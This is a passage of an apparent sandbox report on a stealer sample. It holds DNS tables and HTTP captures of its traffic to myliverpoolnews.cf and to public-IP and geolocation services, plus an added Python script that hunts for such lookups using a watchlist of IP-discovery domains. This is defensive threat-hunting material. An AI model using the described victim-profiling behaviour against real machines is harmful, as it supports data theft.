Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.758682013 CEST | 8.8.8.8 | 192.168.2.3 | 0x4c9d | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:34.845623016 CEST | 8.8.8.8 | 192.168.2.3 | 0xd4a3 | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:54.587409973 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bcb | No error (0) | freegeoip.app |  | 172.67.188.154 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:02:54.587409973 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bcb | No error (0) | freegeoip.app |  | 104.21.19.200 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.079967022 CEST | 8.8.8.8 | 192.168.2.3 | 0x7afe | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.099225998 CEST | 8.8.8.8 | 192.168.2.3 | 0xf800 | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.386113882 CEST | 8.8.8.8 | 192.168.2.3 | 0xc04 | No error (0) | freegeoip.app |  | 172.67.188.154 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:12.386113882 CEST | 8.8.8.8 | 192.168.2.3 | 0xc04 | No error (0) | freegeoip.app |  | 104.21.19.200 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.457216024 CEST | 8.8.8.8 | 192.168.2.3 | 0x6506 | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.com |  | 216.146.43.71 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.com |  | 131.186.113.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.com |  | 131.186.161.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.com |  | 162.88.193.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.472771883 CEST | 8.8.8.8 | 192.168.2.3 | 0xca10 | No error (0) | checkip.dyndns.com |  | 216.146.43.70 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.971657991 CEST | 8.8.8.8 | 192.168.2.3 | 0xc9a5 | No error (0) | freegeoip.app |  | 172.67.188.154 | A (IP address) | IN (0x0001)
Apr 8, 2021 11:03:29.971657991 CEST | 8.8.8.8 | 192.168.2.3 | 0xc9a5 | No error (0) | freegeoip.app |  | 104.21.19.200 | A (IP address) | IN (0x0001)
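The DNS tables above show the sample resolving checkip.dyndns.org (a CNAME to checkip.dyndns.com) and freegeoip.app in three rounds, at 11:02:34, 11:03:12 and 11:03:29, well after the exchange with myliverpoolnews.cf. That matches the "May check the online IP address of the machine" signature: the stealer learns the victim's public IP and, from freegeoip.app, its geolocation, to tag what it exfiltrates. A process other than a browser resolving these services repeatedly is a usable hunt signal. The script below is an added example, not part of the Joe Sandbox report or of the sample, that runs that hunt over DNS query records: it flags queries for names on a watchlist of public-IP and geolocation services and groups the hits into bursts so that repetitions can be counted. The watchlist, the log line format and the 5-second burst window are assumptions; the sample lines are transcribed from the DNS Queries table above (nanoseconds truncated to microseconds, time zone dropped).

```python
"""Hunt for public-IP / geolocation lookups in DNS query logs.

Added example, not code from the Joe Sandbox report or from the sample.
Assumptions: the watchlist below is a starting list, the log format is
'YYYY-MM-DD HH:MM:SS.ffffff 0xTID name' (one query per line), and a burst
is any run of hits less than `window` apart.
"""
from datetime import datetime, timedelta

# Services commodity stealers resolve to learn the victim's public IP or
# country. Assumption: a curated starting list, extend it from your own telemetry.
IP_DISCOVERY_DOMAINS = {
    "checkip.dyndns.org",
    "checkip.dyndns.com",
    "freegeoip.app",
    "api.ipify.org",
    "icanhazip.com",
    "ip-api.com",
}

# Constructed input: transcribed from the report's DNS Queries table.
SAMPLE_DNS_LOG = """\
2021-04-08 11:01:44.681437 0x9e2d myliverpoolnews.cf
2021-04-08 11:01:44.803056 0x4547 myliverpoolnews.cf
2021-04-08 11:02:34.746850 0x4c9d checkip.dyndns.org
2021-04-08 11:02:34.833126 0xd4a3 checkip.dyndns.org
2021-04-08 11:02:54.568016 0x8bcb freegeoip.app
2021-04-08 11:03:12.067235 0x7afe checkip.dyndns.org
2021-04-08 11:03:12.087239 0xf800 checkip.dyndns.org
2021-04-08 11:03:12.367260 0xc04 freegeoip.app
2021-04-08 11:03:29.444453 0x6506 checkip.dyndns.org
2021-04-08 11:03:29.460191 0xca10 checkip.dyndns.org
2021-04-08 11:03:29.958946 0xc9a5 freegeoip.app
"""


def parse_dns_log(text):
    """Parse one query per line into dicts with a datetime, int txid and lowercased name."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        date, clock, txid, name = line.split()
        ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S.%f")
        records.append({"ts": ts, "txid": int(txid, 16), "name": name.lower().rstrip(".")})
    return records


def find_ip_discovery_queries(records, watchlist=IP_DISCOVERY_DOMAINS):
    """Return the records whose name is a watchlisted service or a subdomain of one."""
    hits = []
    for rec in records:
        name = rec["name"]
        if any(name == dom or name.endswith("." + dom) for dom in watchlist):
            hits.append(rec)
    return hits


def group_bursts(hits, window=timedelta(seconds=5)):
    """Group hits into bursts: consecutive hits less than `window` apart.

    A stealer resolves its IP-check and geolocation services back to back each
    time it prepares a report, so bursts are the unit to count, not single queries.
    """
    bursts = []
    for rec in sorted(hits, key=lambda r: r["ts"]):
        if bursts and rec["ts"] - bursts[-1][-1]["ts"] < window:
            bursts[-1].append(rec)
        else:
            bursts.append([rec])
    return bursts


def hunt(text, window=timedelta(seconds=5)):
    """Summarise which services were resolved, how often, and in how many bursts."""
    records = parse_dns_log(text)
    hits = find_ip_discovery_queries(records)
    bursts = group_bursts(hits, window)
    return {
        "services": sorted({rec["name"] for rec in hits}),
        "hit_count": len(hits),
        "burst_count": len(bursts),
        "burst_starts": [b[0]["ts"].strftime("%H:%M:%S") for b in bursts],
    }


if __name__ == "__main__":
    print(hunt(SAMPLE_DNS_LOG))
```

On the transcribed rows this reports two services, nine hits and four bursts rather than three, because in the first round the freegeoip.app lookup came 20 seconds after the checkip.dyndns.org pair, while in the later rounds it followed within half a second; widen the window if you want rounds instead of tight bursts. A single lookup of one of these services is weak evidence on its own, since some legitimate software uses them too. What makes it worth alerting on is the requesting process (here C:\Users\user\Desktop\lfQuSBwdSf.exe, not a browser) together with the repetition, so in production join these hits to process-attributed DNS telemetry such as Sysmon event ID 22 before paging anyone.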

HTTP Request Dependency Graph

• myliverpoolnews.cf
• checkip.dyndns.org

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.349700104.21.56.11980C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 8, 2021 11:01:44.763689041 CEST1125OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:01:44.789665937 CEST1126INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:44 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:44 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html
                                                        cf-request-id: 0952505fc400002bd23ba83000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=XwmX5ySeaG4eevDa%2FP04VvipikZHPpRO%2FF3tIBV5NbuBA2RpBCIKkMorKYyO4EloOW3yiVGy%2BM7wNR%2FPg%2FysydqcyAkokNUfW2jqEcewsFpbnBQ%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca5012dfb72bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Apr 8, 2021 11:01:45.927328110 CEST2428OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Apr 8, 2021 11:01:45.947901011 CEST2429INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:45 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:45 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html
                                                        cf-request-id: 095250644f00002bd223b7d000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FM5OpJ9ZNhUXYnGpSkNb%2FUtZPySDSsvajfeM4j8STf9GIOWR45sdkEsLIhpSSfqEN7XEGXfP8XhuLIkYDfbs2LuwkZfpRXsVYCZSjrNCUOzV2wU%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca501a1bb42bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
                                                        Apr 8, 2021 11:01:48.776110888 CEST | 3738 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html HTTP/1.1
                                                        UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                        Host: myliverpoolnews.cf
                                                        Apr 8, 2021 11:01:48.797709942 CEST | 3739 | IN | HTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 08 Apr 2021 09:01:48 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Cache-Control: max-age=3600
                                                        Expires: Thu, 08 Apr 2021 10:01:48 GMT
                                                        Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.html
                                                        cf-request-id: 0952506f7100002bd2259ac000000001
                                                        Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ThxZPwViEomojqqL9TYKZl1FY0onC5hnScyCYl%2BZodngPBmYO9P1MTEK1lipzYJy0Mh8OBpGnFzpFVupNRQJ0RL8kyCbxJWmlX1LJu945sWb1Eo%3D"}],"max_age":604800}
                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 63ca502bea0c2bd2-FRA
                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.3 | 49720 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:02:35.342420101 CEST | 4915 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Connection: Keep-Alive
                                                        Apr 8, 2021 11:02:35.450606108 CEST | 4915 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        10 | 192.168.2.3 | 49755 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:15.023585081 CEST | 5053 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:15.128920078 CEST | 5054 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        11 | 192.168.2.3 | 49762 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:17.074606895 CEST | 5064 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:17.180192947 CEST | 5065 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        12 | 192.168.2.3 | 49764 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:18.124327898 CEST | 5077 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:18.229459047 CEST | 5078 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        13 | 192.168.2.3 | 49765 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:19.316049099 CEST | 5078 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:19.421181917 CEST | 5084 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        14 | 192.168.2.3 | 49768 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:20.784250021 CEST | 5106 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:20.889914036 CEST | 5106 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        15 | 192.168.2.3 | 49769 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:22.463843107 CEST | 5119 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:22.569499016 CEST | 5119 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        16 | 192.168.2.3 | 49770 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:24.109728098 CEST | 5120 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:24.214984894 CEST | 5120 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 185.32.222.8</body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        17 | 192.168.2.3 | 49771 | 162.88.193.70 | 80 | C:\Users\user\Desktop\lfQuSBwdSf.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Apr 8, 2021 11:03:25.727107048 CEST | 5121 | OUT | GET / HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                        Host: checkip.dyndns.org
                                                        Apr 8, 2021 11:03:25.835148096 CEST | 5121 | IN | HTTP/1.1 200 OK
                                                        Content-Type: text/html
                                                        Server: DynDNS-CheckIP/1.0.1
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        Content-Length: 104
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 35 2e 33 32 2e 32 32 32 2e 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
